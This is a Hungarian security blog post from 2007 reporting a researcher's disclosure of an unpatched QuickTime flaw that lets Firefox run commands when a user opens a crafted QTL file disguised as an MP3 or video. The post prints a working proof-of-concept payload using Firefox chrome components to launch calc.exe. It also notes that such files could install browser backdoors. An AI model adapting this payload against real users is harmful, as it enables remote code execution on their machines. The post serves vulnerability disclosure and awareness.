Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

QuickTime üti Firefoxot

2007.09.13. 09:05 | buherator | Szólj hozzá!

Petko D. Petkov még tavaly tett közzé két highly critical QuickTime hibát, melyek közül az egyiket kijavították, a másikkal azonban nem törődtek. Az év végén tett még egy kísérletet, hogy felhívja a figyelmet a foltozatlan hibára, eredményt azonban ezzel sem ért el. Most újra próbálkozott, és egy olyan módszert publikált, melynek segítségével elvileg bármely QuickTime bővítménnyel rendelkező Firefox böngésző távoli parancsfuttatásra bírható, egy félelemetesen egyszerű kód segítségével:

Kezdjük az elején! Az alábbi egyszerű kód QTL fájlként futtatva egy egyszerű üzenetet jelenítmeg a képernyőn:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up...')"/>


A dolog érdekessége az, hogy ez a kód bármilyen QuickTime által támogatott audió és videó kiterjesztéssel elmenthető. Így az alábbi exploit

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath('c:\\windows\\system32\\calc.exe');
process=Components.classes['@mozilla.org/process/util;1'].
createInstance(Components.interfaces.nsIProcess);
process.init(file);process.run(true,[],0);void(0);"/>


gyakorlatilag tetszőleges média fájlnak álcázható. A hiba kihasználásával a hamisított fájlt megnyitó felhasználó jogkörével tetszőleges kód futtatható, de adminisztzrátori jogkör nélkül is installálhatók hátsó kapuk a böngészőbe.

Demonstráció gyanánt íme néhány okosan megírt média fájl (nem okoznak kárt):

BEYONCE.mp3
pr0n0.mov
FunnyDog.mpeg
GhostInTheShell.avi

A fennti kódok Windowshoz készültek, de a hiba elvileg bármilyen platformon kihasználható!

Ja igen, plusz szépsége a dolognak, hogy a QuickTime automatikusan betelepül a Firefoxba, ha az ember felrak egy iTunest, szóval elég sokan érintettek a dologban...

Címkék: firefox itunes bug quicktime 0day

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.
süti beállítások módosítása